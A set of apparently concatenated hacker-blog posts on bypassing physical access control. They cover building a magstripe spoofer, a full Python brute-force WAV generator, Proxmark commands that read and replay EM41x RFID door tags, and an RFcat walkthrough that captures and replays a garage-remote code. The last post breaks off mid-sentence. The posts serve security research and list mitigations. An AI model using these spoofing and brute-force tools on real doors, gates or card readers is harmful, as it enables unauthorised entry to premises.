Candy:

Write-up:

So in the first blog post I discussed the basics of Magnetic stripes and how the tech works. I like it because its fundamentally simple (perhaps like myself ;).

This entry is going to cover spoofing, from building a spoofer to having something read the entries. Ideally you want to have a magreader at this stage, either one of the nifty USB ones that act as an HID device or one that you built that can read the tracks you are interested in. Below is a cheap TTL reader I got (cost about R150, thats ~$20):

This is really just so that you can “listen” to what your spoofer can generate. Magnetic stripe spoofers have been done all over the place, so please don’t think I did this, you can see some great examples HERE and HERE. Essentially however the system is dead simple, you have the ‘sound’ that you wish to play (as discussed previously), an amplifier that can crank up the volume to the level that its going to get picked up and an electromagnet (it sounds fancy, its  just wire coiled around a piece of metal – more later).

The Amp

First up you want to build an amplifier. This seems incredibly daunting to someone who knows f-all about hardware (thats me!), however its not nearly as complicated as what I thought. I built one from an LM386 chip (it seems to be the easiest/most common), the layout for it looks like so:

But really you can find a whole bunch on the net, just hit up the google machine.

Really when it comes down to it, you only need:

• LM386
• 220 uF cap
• 0.05 uF cap
• Mono Jack
• 9v Battery
• Pot

Here you can see mine, complete with terrible wiring,soldering and running on a 9v battery, luck and good feelings:

Best way to test the amplifier is to get an old school PC speaker, hook it up and play some audio through it, adjust the pot to check your volume control works and you are good to go. The sound quality isnt that great, but heck it works if you ever need a speaker system too :P

The Electromagnet

The next step is to create the electromagnet, essentially what it does is that when current is passed through the coil of wire that is wrapped around a ferromagnetic object an electromagnetic field is created . By turning this on and off rapidly we can create the differences we have seen previously in how magstripes work.  So for this part our partlist is as follows:

• Coil of thin wire (as thin as you can get without it becoming a hairball — I have 2 at home)
• Ferromagnetic core, I just used some plain old sheet steel

I read a number of the other magstripe spoof tutorials and it seems that the easiest way was to use either a rectangular piece of steel or an ‘I’ shaped piece of steel (the I makes it easier to wrap the wire around). First thing I did was get these cut out I managed to get a bunch of different strips out, I then used a cut up 2L coke bottle and put the strips in some deoxidene to get them clean:

So once I had nicely cleaned pieces I needed to cover them in very thin wire. Initially I bought what seemed to be hair width hair (0.1 mm enamel/copper wire), my advice to anyone trying to use this is WALK AWAY SCREAMING. Literally I ended up both breaking the wire on the edges of the steel or ending up with a birdsnest where I couldnt actually thread the wire. However if you are looking to punish someone, I recommend this.

So I went to another electronics store, bought some 0.25 copper wire and some white marker tape to blunt the edges and started winding till I had a nice electromagnet:

Now I finally had both my electromagnet and amp together, I really just need to connect the two together.  Now the previous video probably makes a bit more sense, essentially what I did was connect the amp to the electromagnet to the output from my pc (at that stage playing Dead Kennedys – California Über Alles ), then on a seperate pc I used the previous magnetic read head connected to another computers microphone input and set the computer to play everything that came into that port. The result was me being able to play audio from one pc to another via my electromagnet:

Attacking

Now we had the ability to play ‘audio’ through the amplifier and electromagnet AND if you remember from the previous blog entry magstripes really are just audio we had a few options with what we could do:

• Replay a card – Since magnetic cards are just a single track and usually not changed during an entry swipe  we could make a quick copy of a card and replay it to a reader
• Brute force a card – If a cards value is “accesslevel#1″, naturally we could change that from 1 to be 1-99999 and generate audio for just that

IMPORTANT: As we have a single magnetic field we are creating we can only replay a SINGLE track at a time, this means that while its great for something like access control and other systems that generally use one track you arent going to be able to spoof to a reader that is looking for all 3. However with that being said, if you play the tracks back to back often a reader will still see it as the ‘same card’, in practice however its very unlikely that you will come across this.

Generating Audio

Adam Laurie (Major Malfunction)  – an amazing researcher – previously created a few files (found in the same places as referenced in the last blog post) to not only take wav files apart and give you the ability to identify the data contained within it, but ALSO the ability to create these wavs. Here I created a quick wav file of a sample track 1 for a card, “%B0126672737012367^MOHAWK/ANDREW.MR          ^120119850000555        ?” :

After that I got a nice clean audio file out:

The one thing you will instantly notice is that my audio file does not look ANYTHING like the previous audio files we had, these are all square waves where previous they were scintillating sine waves! This is due to the fact that in the code you will notice (# sinewaves need to be half waves to work – can’t be bothered to # figure it out now!), however they work perfectly well as the readers are not decoding the actual waves but the gaps inbetween.

Naturally generating the audio this way is a bit of a pain having to first create the magstripe binary string and then create the wav file, so I combined the two into a script I will discuss later. For now I had the audio, I had the amp and I had the electromagnet, on to testing! While testing/debugging I found it very useful to use the audio from the original magstripe ‘audio’ reader created from the TTL device, but later I got my hands on one of the many cheap USB type readers available and could then hear if it was working correctly (it beeps) as well as see the decoded signal on the screen (its simply an HID device and ‘types’ the output to the screen).

Some Problems: So before I get to the final section of replaying and brute forcing, there are a few problems you should note with this. Firstly as discussed previously you cannot spoof multiple tracks at once. The second major problem is the volume output from your amp, as the readers essentially are reading your ‘song’ if the sound is clipping (is too loud) or is too soft the reader will essentially not be able to ‘hear’ your data. You would have seen from my ZaCon talk that my demo failed and that was because I accidentally moved the volume level down on my ipod from 100% (which everything was configured for) to 95%, and such a small volume difference can be all the well.. difference. Lastly readers often have a specific timeout they regard for a card swipe (a time they think the slowest swipe will take) which means that when brute forcing you will need to have a delay between each individual “card” or the device wont give you a positive/negative for it.

Replaying/Spoofing

Replaying is pretty trivial, simply record the audio in the method described in the previous post or using the TTL reader you built and then replay it through the amp to the electromagnet, remember to keep the electromagnet close enough to the read head that it can simulate a card passing and the read head can pick this up. To be fair I’d almost never do this, its far easier to simply purchase something like an MSR605 (I picked one up on eBay for relatively cheap) and simply create your own card – Ive done this with many hotel room cards/access control systems without ever having a problem. It means you look a lot less suspicious as you dont have any electronic devices plugged into the gate and if it doesnt work you can quite easily walk away :) It also means that if you do figure out something say that escalates your access control you can simply “write” that card and use that.

Brute Forcing

While replaying and spoofing is great, it means you still need access to a card and will always be using that card with its limitations. Many access control systems are trivially implemented and will either be configured individually on the entry system to allow certain cards (such as allow cards 00001/2/3/4/5) or be centrally linked to something that identifies a user (such as a student number for a university – information which can be found publicly). With this in mind the possibility of gaining access becomes a lot more realistic when bruteforcing (presuming of course you have access to a card for the system you are looking into).

So after mangling the scripts for my ZaCon talk (I hope this is okay with MM – I did include all his copyright etc) I came up with this:

'''
This script was hacked together using Major Malfunctions cab.py and cmsb.py, licenses from those as follows:
 
# 
# cmsb.py: Create MagStripe Binary
# Convert ASCII data to ABA/IATA binary with LRC
# Inspired by dmsb.c by Joseph Battaglia <sephail@sephail.net>
# 
# Copyright 2006,2007 Major Malfunction <majormal@pirate-radio.org>
# version 0.1 (IATA only)
#   http://www.alcrypto.co.uk/
#   Distributed under the terms of the GNU General Public License v2
# version 0.2 (add ABA capability, characterset checking)
#   Parts Copyright 2007 Mansour Moufid <mmoufid@connect.carleton.ca>
#   Distributed under the terms of the GNU General Public License v3
 
# cab.py: Create Aiken Biphase
# create a WAV file with arbitrary data in it
#
# Copyright(c) 2006, Major Malfunction <majormal@pirate-radio.org>
# http://www.alcrypto.co.uk
#
# inspired by 'dab.c' by Joseph Battaglia <sephail@sephail.net>
#
#   Permission is hereby granted, free of charge, to any person obtaining a copy
#   of this software and associated documentation files (the "Software"), to
#   deal in the Software without restriction, including without limitation the
#   rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
#   sell copies of the Software, and to permit persons to whom the Software is
#   furnished to do so, subject to the following conditions:
#
#   The above copyright notice and this permission notice shall be included in
#   all copies or substantial portions of the Software.
#
#   THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#   IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#   FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#   AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#   LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
#   FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
#   IN THE SOFTWARE.
#
# version 0.1:
#	just get the thing working with fixed WAV and other parameters!
 
Password gen stuff thanks to Nadeem Douba ( @ndouba )
'''
import sys
import string
from operator import *
import wave
import sys
from struct import *
from math import *
 
def _baseN(num, base, numerals):
    if not num:
        return numerals[0]
 
    if num < 0:
        return '-' + _baseN((-1) * num, base, numerals)
 
    if not 2 <= base <= len(numerals):
        raise ValueError('Base must be between 2-%d' % len(numerals))
 
    left_digits = num // base
 
    if left_digits == 0:
        return numerals[num % base]
    else:
        return _baseN(left_digits, base, numerals) + numerals[num % base]
 
def baseN(num, numerals="0123456789abcdefghijklmnopqrstuvwxyz", padding=0):
 
    n = _baseN(num, len(numerals), numerals)
    l = len(n)
 
    if l < padding:         n = '%s%s' % (numerals[0] * (padding - l), n)     return n 	 	 def createSquareWav(wavFile,freq,data,reverse,delay): 	 	 	frequency= int(freq) - 1 	 	if reverse == True: 		newdata= [] 		n= len(data) - 1 		while n >= 0:
			newdata.append(data[n])
			n= n - 1
		data= newdata
 
	peak= 32767
	wavedata = []
	#Trailing space
	for x in range(int(22050 * delay)):
		wavedata.append('\x00\x00')
		#wavFile.writeframes('\x00\x00')
 
	for x in range(20):
		wavedata.append(pack("h",0))
		#wavFile.writeframes(pack("h",0))
 
	# write the actual data
	# square wave for now
	n= 0
	writedata= peak
	while n < len(data):
		if data[n] == '1':
			for x in range(2):
				writedata= -writedata
				for y in range(frequency/4):
					wavedata.append(pack("h",writedata))
					#wavFile.writeframes(pack("h",writedata))
		if data[n] == '0':
			writedata= -writedata
			for y in range(frequency/2):
				wavedata.append(pack("h",writedata))
				#wavFile.writeframes(pack("h",writedata))
 
		n= n + 1
 
	#for x in range(32000):
	#	wavFile.writeframes('\x00\x00')
	for x in range(int(22050 * delay)):
		wavedata.append('\x00\x00')
 
	#Doing it this way takes some tests I did from 1min 15secs to 2seconds!!!!!!!
	value_str = ''.join(wavedata)
	wavFile.writeframes(value_str)
 
def createAikenBiphase(tracknum,data,padding):
	if int(tracknum) == 1:
		bits = 7
		base= 32
		max= 63
	elif int(tracknum) == 2 or int(tracknum) == 3:
		bits = 5
		base= 48
		max= 15
 
	zero = ''
	lrc = []
 
	for x in range(bits):
		zero += "0"
		lrc.append(0)
	output = ''
 
	#padding = 0
 
	for x in range(padding):
		output += zero
 
	for x in range( len(data) ):
		raw = ord(data[x]) - base
		if raw < 0 or raw > max:
			print 'Illegal character:', chr(raw+base)
			sys.exit(False)
		parity = 1
		for y in range(bits-1):
			output += str(raw >> y & 1)
			parity += raw >> y & 1
			lrc[y] = xor(lrc[y], raw >> y & 1)
		output += chr((parity % 2) + ord('0'))
 
	parity = 1
	for x in range(bits - 1):
		output += chr(lrc[x] + ord('0'))
		parity += lrc[x]
	output += chr((parity % 2) + ord('0'))
 
	return output
 
if len(sys.argv) < 5:
	print "createWavs.py v0.01"
	print "Usage: %s   OutputFile.wav    <[r]everse> <delay_at_front_and_back> " % sys.argv[0]
	print "Samples defaults to 15, Padding to 0"
	print "* = Try all in range for track, eg, T2 = 0,1,2,3,4,5,6,7,8,9,:,;,<,=,>,?"
 
	sys.exit(False)
 
print "-------------------------------------------------"
print "      Marty McFly's Wav Generator                "
print "      Generating Aiken Biphase Wav Files         "
print "         by Andrew MacPherson (@AndrewMohawk)    "
print "-------------------------------------------------"
tracknum = int(sys.argv[1])
data = sys.argv[2]
padding = 0
 
if(len(sys.argv) > 4):
	padding = int(sys.argv[4])
 
samplesPerBit = 15
if(len(sys.argv) > 5):
	samplesPerBit = int(sys.argv[5])
 
reverse = False
if(len(sys.argv) > 6) and (sys.argv[6] == 'r'):
	reverse = True
delay=0
if(len(sys.argv) > 7):
	delay = float(sys.argv[7])
 
results = []
numStars = data.count("*")
print "[+] Found %s number of brute force fields" % numStars
bruteForceList = [];
if(tracknum == 1):
	for z in range(32,95):
		bruteForceList.append(chr(z))
if(tracknum == 2 or tracknum ==3):
	for z in range(48,64):
		bruteForceList.append(chr(z))
 
#print bruteForceList
#exit(0)
#bruteForceList = ['A','B']
if (numStars > 0):
	print "[+] Generating Aiken Biphase... "
	pfmt = data
	i = 0
	while True:
		n = baseN(i, bruteForceList, numStars)
		if len(n) > numStars:
			break
		tmp = pfmt
		for c in n:
			tmp = tmp.replace('*', c, 1)
		#results.append(tmp)
		results.append(createAikenBiphase(tracknum,tmp,padding))
		i += 1
else:
	results.append(createAikenBiphase(tracknum,data,padding))
 
print "[+] Generated %s Results" % len(results)
print "[+] Building consecutive wav file.."
 
wavFile=wave.open(sys.argv[3],"w")
params= (1, 2, 22050, 0L, 'NONE', 'not compressed')
wavFile.setparams(params)
for r in results:
	createSquareWav(wavFile,samplesPerBit,r,reverse,delay)
 
wavFile.close()

You can grab the file here.

Essentially the script allowed you to create a longer wave file that you would play to the device with the following options:

* Track Number (remember we can only do 1 at a time)
* How many padding 0′s we should use
* How many samples per bit we would create in the audio file (essentially how big the gaps are)
* Reversing of the data (y/n)
* Delay inbetween tracks to ensure that you give the reader enough time to process it.

I could then place a * within the data which would try every possible combination for that point (depending on which track you were using) and get a ‘brute force’ wav file back :)

From here I could then connect everything up, create a wav file which I put onto an audio player (simply so I wasnt using a laptop) and with a tiny device brute force my way in. Here is a video of it in action with an old bank card and my ipod:

(You will note my amp here looks a lot fancier – someone else kindly built me a new one after having a look at mine! )

Conclusion

Magstripes are old tech and are definitely susceptible to brute force and replay attacks via a few Rands (or dollars) of equipment. There are limitations that can make this a lot harder such as:

1. Checking that multiple tracks are being read at once (it costs more for the readers, but its access we are talking about)
2. Logging possible brute force attempts (and having higher read timeouts, costing attackers time when trying to brute force)
3. Lockout conditions if a card is used multiple times in an unusual manner (although this could provide a DoS scenario for an attacker)
4. Encryption on the card data means that the person brute forcing would need to figure out how your data is encrypted first

Eye Candy:

My friend Roelof Temmingh (@Roeloftemmingh) made this cool video for my talk, check it out below or at http://vimeo.com/51228567.  Please note we had permission to test out the door at Senseposts’ old office :)

Mission Plausible from RT on Vimeo.

:)

Intro:

So It started with me wanting to get into a building that has RFID tags for my talk on the basics of bypassing physical security. The first things I had to do was to find out about how RFID actually works and what types there are and so on. Essentially there are two very common flavours:

* 125Khz / 134Khz – LF (Low Frequency) tags — NB. these are most commonly used for access control.
* 13.56 Mhz – HF (High Frequency) tags — these seem to be used more for payment and other public infrastructure such as train systems

The other big differentiators that I saw were between battery powered (active) and non-battery powered (passive) tags. In smaller sealed form factors such as the mini key FOBs and so on it seems to me that most if not all are passive. These tags are powered by the EM field of the reader (which is pretty small and why you need to put your tag almost on the reader before it is read).

Essentially the LF Passive tags get powered on and scream out a code until they are powered off (moved away). Active tags seem more common with high end security devices and those used outside of access control on this like Ultra High Frequency (UHF) tags for monitoring vehicles.

LF got your nose?

So after identifying the common types I had to figure out what kind of tags I was dealing with, one way of doing it is by looking at the tags under a light or opening them up and taking a look at the antenna, basics are: lots of coils (longer piece of wire) its most likely HF, less wire (less coils) its most likely LF tags.

Naturally my DIY skills tend to turn into me using multiple plasters and crying so taking apart the FOBs that I received seemed like a bad idea. Google, however, is one of my best friends and most systems have something online that give away the type of tag as well as the encoding (I’ll get to this next). The tags I had turned out to be GSC System Proximity tags connected to a “Proxlock”, the information on the tags was available at http://www.gscsystems.com/gsc_site_files1/proximity_cards_and_tags1/620-10-proximity-mini-keyring-tag/620-10-proximity-mini-keyring-tag.htm , the interesting parts being:

This naturally gave me what I needed to know that it was a 125Khz (LF) tag and even some information on the data. The term “security data” seemed daunting at the time and could have implied some sort of crypto, but it worked out in the end ;)

The last way that you can determine the tags is by using the proxmark3, really a great device and I was lucky enough to get a second hand one from Major Malfunction a few Defcon’s ago for cheap and it hasn’t let me down since.  The screenshots of my proxmark are from a windows environment simply because it was easier to get to from here but I really recommend running it on a *nix based system as it seems to be a lot more stable/functional!

Essentially the proxmark comes with a function to tune the antennas which allows you to adjust them to see how well they are tuned. To get it it simply plug in your proxmark and either a HF or LF antenna and type ‘hw tune’ after loading up the proxmark interface:

With LF antenna and no tag present:

With LF antenna and an LF tag present:

As you can see from the above the voltage picked up by a rather high amount and told us that the tag we presented was indeed a LF tag.

Data Shmata:

Next step of course was trying to read the data, and figure out exactly what was being sent. At this stage I knew the tags were LF (125Khz) and that the data was some sort of Amplitude Shift Keying as well as Manchester encoding (not that I had any idea on the first one just yet). Additionally I knew there was “security data” on the tags, so it might not be sending the same message but might use something like KeeLoq or another cryptographic algorithm to decide what to send.

Proxmark is an AMAZING device/toolset for playing with this type of stuff and includes common setups with preconfigured functionality as well as the ability for you to get raw data out and plot it. After doing a bit of reading on the device and going through the forum I decided to tackle it the old fashioned raw way. First step was getting the data and plotting it, from the Proxmark interface I simply do the following:

* lf read – this seems to be a requirement a bunch of the time to get it to use the LF antenna, i am not sure, but do this for good measure it won’t hurt.
* data samples 4000 – This takes 4000 samples and reads them into a buffer so that you can visualise them on the graph
* data plot – Simply plots the data as seen below:

Now I have the data I need to demodulate it, similar to what is done with the radio data (after all this is still radio, just very low freq radio :)). The data is encoded in the amplitude of the  carrier wave using a technique known as Amplitude Shift Keying (you can read more at Wikipedia , but you dont really need to know it).  As I just said, while its nice to know, the proxmark can do all of the demodulating for you so that you do not even need to worry about what ASK is.

To demodulate your data now you can simply use the function ‘data askdemod‘ and hey presto, square wave:

So now we have the square wave we need to get the raw binary out, these types of LF cards generally use manchester encoding to …encode the data. Again proxmark and its toolkit of awesome has a handy function to demodulate the data for you “data mandemod”. You read more about manchester encoding on the wiki page. The most important aspect to note is that there are two different conventions for representing the data, one where the 1′s are high-to-low and the other the 1′s are a low-to-high. So if the device you are working with uses one you can either use the data directly or simply invert the data to get it into the other format. An example of the output can be seen below:

The outputted data is as follows:

0 1 0 0 0 1 0 0 0 1 1 1 0 1 0 0
1 1 0 0 0 0 0 0 0 0 0 1 1 1 1 1
0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1
0 0 0 0 0 1 0 0 0 1 1 0 1 0 1 1
0 1 0 0 0 1 0 0 0 1 1 1 0 1 0 0
1 1 0 0 0 0 0 0 0 0 0 1 1 1 1 1
0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1
0 0 0 0 0 1 0 0 0 1 1 0 1 0 1 1
0 1 0 0 0 1 0 0 0 1 1 1 0 1 0 0
1 1 0 0 0 0 0 0 0 0 0 1 1 1 1 1
0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1
0 0 0 0 0 1 0 0 0 1 1 0 1 0 1 1
0 1 0 0 0 1 0 0 0 1 1 1 0 1 0 0
1 1 0 0 0 0 0 0 0 0 0 1 1 1 1 1
0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1

Playing with it slightly I can see the following patterns:

010001000111010011
0000000001111100001111111111110000010001101011010001000111010011
0000000001111100001111111111110000010001101011010001000111010011
0000000001111100001111111111110000010001101011010001000111010011
000000000111110000111111111111

After repeating this process a few times, i’m getting the same repeated data the whole time — fantastic!

Decoding Data:

So I started looking around and speaking to a few other people and after a bit of reading I found out that the format of the data was in EM41x tag. Essentially you can spot it by the 7 leading 1′s (or 0′s in our case due to the Manchester Encoding issue I described earlier). Even better the format is really well described (even with pictures for me!):

http://www.priority1design.com.au/em4100_protocol.html

Throwing our data into that format (and I have a webapp for that — in the next section) the data bits for the fob i was testing were ’11110110010001011011000′ which in hex was ‘FB22D8′ and most importantly was 8069848 in decimal, the EXACT number written on my FOB.

Webapping the Decoding:

So at this stage I had found a few interesting things, namely, the FOBs were sending out EXACTLY what was written on them, prefixed with 0f as the manufacturer code. Additionally the binary would also need to sometimes be inverted depending on which Manchester encoding standard was used. Later on I found out I needed to have the full binary as well as other to transmit and spoof the data. Lastly because the tags were sending out exactly what was written on them I also wanted to have a way to be able to generate tag data from just the number so I built an encoder as well.

You can use the webapp at http://andrewmohawk.com/EM41X/ and get the tarball for it at http://andrewmohawk.com/EM41X/EM41x.tgz

Spoofing:

So now I have the ability to read the data, I know what it is sending and I can create either a copy of a tag from the text that is written on it or by reading it with my proxmark. Now I want to gain access to whatever it is that the tag is opening (in this case the entrance door as seen in the video).

There are two ways to spoof the tags  with the Proxmark, either with the EM41x toolset or manually. I prefer to have a bit more control over the data when testing, so mostly I am doing it manually, but the functions in the EM410x set seem to work well.

*NB* If you have a wire/movable antenna the shape it of seems to GREATLY impact how well you transmit. I found a square shape worked the best for TX. (I also know nothing about antenna design – use salt).

Manually:

The most common way to transmit the data is to manually set the clock speed and data, the command is the ‘LF simman’ and has 3 params:
* The Clock speed (generally 64)
* The actual data
* The Microsecond gap that is to be used between transmits (nice if you want to test reliability)

So for the example I have been using I put the data into the webapp and then use the following on the proxmark:

lf simman 64 1111111110000011110000000000001111101110010100101110111000101100 10

EM41x Toolset

The proxmark has a number of tools for the EM41x format and they can be find by typing ‘lf em4x’ into the proxmark console. Essentially to simulate the tag all you need is the hex value that the key is sending out (in this case – 0f007b22d8) and to use the ‘lf em4x em410xsim <key>‘ command.

The toolset also has additional functionality to watch for a tag and then record it as well as try and decode the data in the buffer and so on.

What you should be concerned about:

Photobomb Much?

Naturally seeing the data is pretty neat, but seeing the data transmitting something that is WRITTEN on the card is terrifying. We did some basics tests at the office and Roelof could stand relatively far away and take a photo of my keys on the table where my tag was to get a clear enough image for us to read the numbers. Additionally it seems easily possible to take a photo of someone standing in front of your target (say at a coffee shop or elsewhere) and zoom past them to get a snap of the keys from quite the distance.

HIGH RES IMAGE (aka, see for yourself) : http://andrewmohawk.com/BackgroundShotOfTable.JPG (5mb)

Raw data? Sequential numbers? Root?

Besides for the fact that someone could read your cards data I also noticed that a lot of the data is NOT being used. When testing I found that I could put anything in for the version or customer id. This means that the only data that is being used is the 32 bits, which is a rather large space ( 2^32 = 4294967296 ). However because of the problem of this data being human readible in the real world it also means that someone could have a sequential batch of tags (I got one when I ordered 10 tags) which means that I merely need to go up and down numerically from your cards number. The additional impact of this means that I could see a junior employee’s tag and by brute forcing the tags around it gain access to places where that previous tag wouldn’t have had access to.

Apart from that it also means someone could stumble upon the ‘root’ card, which allows other cards to be added to the system or removed or even to reset the system.

Denial of Service?

The readers I tested with were only capable of reading a single tag at a time and placing two tags next to each other meant the interference was too high for the system to get a good read and essentially nothing happened. However the same situation played up when a tag was placed on the outside as well as on the inside of the door (it was separated by a glass wall), essentially what this meant was that I could go to a building where they had access control in and out of the building and use a sticker-type LF RFID tag and stick it underneath the readers and essentially ‘lock’ the door since no one could get in or out. Alternatively if there was just one reader that was used from both sides (as commonly installed through doors/building entrance and exits) where  someone needs to ‘tag’ out and a malicious person tapes an RFID card/sticker to the outside (presumably that the public can get to) and break the ability for anyone inside to ‘tag’ out.

RTE?

Of the three low end systems that I looked at all 3 of them included an RTE or Request To Exit cable. Essentially if you needed an RTE where staff can press a button to open the door you simply shorted the green and white ( for all 3 it was these colours for RTE) the door would open. For 2 of the 3 systems you had to enable it with the master code, but 1 of them had it enabled by default, which means that if you could access the wiring you simply need to short green and white to open the door.

“Security Data”

While the specification mentions security data from the brief analysis I did on the tags there definitely wasn’t any of that on them :( — although it most likely got changed by someone who didn’t understand parity.

 Solutions?

The solutions to solving the above problems are relatively simple:

* Remove the numbers from the outside of the cards/fobs
* Make sure you aren’t getting sequential cards/fobs
* Disable RTE on your doors where possible.

Some of the other problems are a bit harder to solve but should be possible:

* Log all access attempts to check for brute forcing
* If a reader has been busy for a long period of time without a break send someone to go look.

-AM

I see I haven’t update this blog in ages, I’d love to say I didn’t have enough time, but it was mostly just me being.. well lazy.

Zacon IV was on the 27th of October ( http://www.zacon.org.za/about.html ) and was really great, had a super time and met some great people. My talk covered a bunch of the stuff I did on the blog and essentially these sections:

* Lockpicking (briefly)
* Magstripes (reading + spoofing)
* RTLSDR (listening to guards)
* RFID (proxmark – bypassing LF EM4x door locks)
* RFCat (spoofing remotes)

It went relatively well apart from a few small demo problems (such as not being able to spoof a magnetic stripe – turned the volume down by mistake when I tried to show it! *doh*). The video of the talk can be seen here:

ZaCon4 – Andrew MacPherson – 88MPH Digital tricks to bypass Physical security from ZaCon on Vimeo.

If you want the slide deck you can grab it from: http://andrewmohawk.com/zacon-ivy/88MPH-full.pptx So anyway, there are a few topics that I started writing but got lazy to compliment the talk, but these are what I should cover in the next few articles (I hope):

* Magstripes Part 2: Spoofing
* Bypassing LF tags

Additionally the badges this year:

And my custom badge for this year:

Additionally if you want to see the other Zacon talks (I recommend the MWR talks – definitely my favourite!) you can view them at http://vimeo.com/zacon

So with this post it will hopefully force me to write the others!

-AM

Overview

The basic components are:

* RTL-SDR on a windows machine with the HDSDR application installed (really easy to use — saves me doing hard work)
* Audio application to look at demodulated stream (I like the open-source project Audacity )
* RFcat under linux for easy transmission of data – find more about RFcat at http://code.google.com/p/rfcat/

Then there are 3 basic steps to a replay/bruteforce attack:

* Capture Signal: Figure out what frequency it is on, figure out what modulation is used
* Decode Captured Signal: Decode the signal to data you can work with so you can replay it and if possible brute force similar ones
* Transmit Signal: Send off your data for epic-winness (okay its not that complex, but it still feels cool)

Capturing Signal

I am going to assume at this stage that you have access to the remote (otherwise it may be illegal, I think.. lets just go with that). The easiest thing to do firstly is try and identify your remote, here is my garage remote for the complex that I live in (with many garages all of the same type):

If you do have access to your remote, and it is labelled as nicely as mine is, a simple google search should get you the information you need. Mine is a “Sentry Binary One”, quick search gives you http://www.martin-electronics.co.za/tx_403_binary1_3.html which includes a user guide as well as an approval certification, which luckily for us includes that the remote uses AM and OOK modulation as well as that it transmits at 403.55mhz. Epic win! Everything we need is included!

However if you do not have access to the remote (lets say you left it in your friends car who lives with you and your phone is flat and they didn’t see you standing outside the complex), you can use HDSDR to look for the signal when they open the gate/garage. Most remotes run between 300 and 400 mhz ( http://en.wikipedia.org/wiki/Garage_door_opener#Remote_control ) and even with the basic antenna that came with my RTL device I could pick them up from a decent distance:

Once you have it setup, simply fire up HDSDR and keep it running at the 300-400mhz range (typically around 400 or 433 range), for my remote I centered my HDSDR on 403.7 looking for signal around 403.5Mhz:

In the above picture you can see my remote on the left, pulsing as I pushed the button…You will notice my HDSDR is set to AM modulation (and I believe most remotes will be on this).

So now we have the frequency we need to start looking at the actual signal sent out, HDSDR has the great option to record the Audio in a number of means:

* RF (full signal input) – (all the bandwidth, not modulated)
* IF (non-demodulated reduced RF) – I honestly have no idea on this
* AF ( demodulated audio ) – Just the signal we are currently listening to

Note: quick way to get to this screen is to just right click on the record button.

So now we want to record the signal, select AF mode on in the record window and press the record button when the signal is transmitting obviously :) Now we have the signal recorded (it will be a .wav file within the output directory).

Decoding Captured Signal

So now we have the .wav output of our demodulated signal (AM demodulated), we can fire up out  our favourite audio editing application and examine the signal, below you can see what mine looks like in audacity:

It should be rather readily apparent where our signal is, so if you zoom into the signal (looks like a series of arrows pointing upwards) there you will see the following: (zooming in audacity is as simply as ctrl + scrolling)

If you have a closer look at the signal you should see that there are essentially two types/bits being sent, one with a longer “high” (ironically a 0) and one with a much shorter “high” a 1. And if you had to do it in your head you will see that that signal (which is repeated) is: 010010110011 , if you go back to the original image of the gate remote, you will see that the DIP switches are configured to exactly the same binary code.

So now we know that the DIP switches are sending out exactly what they are set to that over AM/OOK (we got that earlier from the PDFs).  At this stage I thought I had everything, but one of the key things I was missing was that this signal was OOK/PWM.

I know it seems very silly now especially after re-reading http://en.wikipedia.org/wiki/On-off_keying but whilst the signal is OOK it ALSO uses PWM or Pulse Width Modulation ( http://en.wikipedia.org/wiki/Pulse-width_modulation ). PWM essentially just means there is a clocking signal as well, so there is a constant on and off, and if there is a high signal it forms a longer period of the signal staying high.

(I couldn’t find a nice picture to explain this, so if someone has one please send it to me!)

So now i have the frequency (403.55mhz), the encoding (AM,OOK,PWM) and I have how the signals are generated and I know there are 12 bits. From here I need to start working on spoofing the signal I have or bruteforcing a range. For this particular remote bruteforcing is possible as I have all the information and the keyspace is small, 2^12 = 4096 keys.

Transmitting the Signal

During Blackhat 2012 there was a fantastic talk/workshop by At1as ( https://twitter.com/at1as ) on his RFCat project (release post) which is on google code ( http://code.google.com/p/rfcat/ ). Essentially what this allows is that people who want to play with RF / security researchers / n00bs (yours truely) can quickly and easily both recieve (RX) and transmit (TX) RF data in the “sub GHz” ( <1Ghz ) range  with hardware that is not expensive and has a very low barrier to entry to get working. I definitely recommend pulling the PDF of the workshop from http://code.google.com/p/rfcat/downloads/list as it covers a huge amount of the tool as well as helpful sections on RF in general.

The RFCat project runs on a number of dongles including the CC1111EMK USB module from Texas Instruments, I bought mine at Blackhat so it came pre-flashed with the firmware, however if you do need to flash the firmware onto yours simple buy one of the dongles ( http://www.ti.com/tool/cc1111emk868-915 – $50 ) and you can flash the firmware with a goodfet.

Once you have the dongle flashed simple copy the required files and you are good to go. There are two main means of interacting with the libraries:

* Interactive Python Shell – Super useful for debug/testing, a bit much if you want to write something specific (we will get to that later)
* Python script (including the RFCat libraries) – Useful for writing security applications

Lets start with the python script, after installing simply run “./rfcat -r” and you should be greeted with a fantastic shell:

The dialog will give you the basics, but just to go over them: There is a global ‘d’ object that is how you will interact with the device, all methods for this object are tab-completable (win!) and the basic methods that you will use are:

d.setFreq(freq) — Naturally sets the frequency we want to transmit on, where “freq” is that, something like d.setFreq(403492750).
d.setMdmModulation(modulation) — Sets the digital modulation (modulation) mode — this is also tab completable! My remote is ASK/OOK so I use d.setMdmModulation(MOD_ASK_OOK).
d.makePktFLEN(length) — When using a fixed packet length you can use this to specify the size of the packets, so if I was sending ‘\xDE\xAD\xBE\xEF’ it would be d.makePktFLEN(4).
d.setMdmDRate(baud) — This function sets the baudrate or how much data is set at a time, for my remote its about 4800 baud so I use d.setMdmDRate(4800)
d.setMaxPower() — Not entirely sure on this, but I presume it gives the most power output and thus the ability to transmit further
d.RFxmit(<bytestring>) — While the example works with a normal string, for all intents and purposes (thanks Conan!) when dealing with digital its a lot easier to send a bytestring, If I was sending 0xDEADBEEF I would use d.RFxmit(‘\xDE\xAD\xBE\xEF’)

For my first trick I’d like to at least see that I am transmitting in roughly the same frequency (garage/gate remotes seem to be less picky about it being exact), so I’ll fire up HDSDR, press my gate remote a few times to identify where the signal is and then run a series of tests like this:

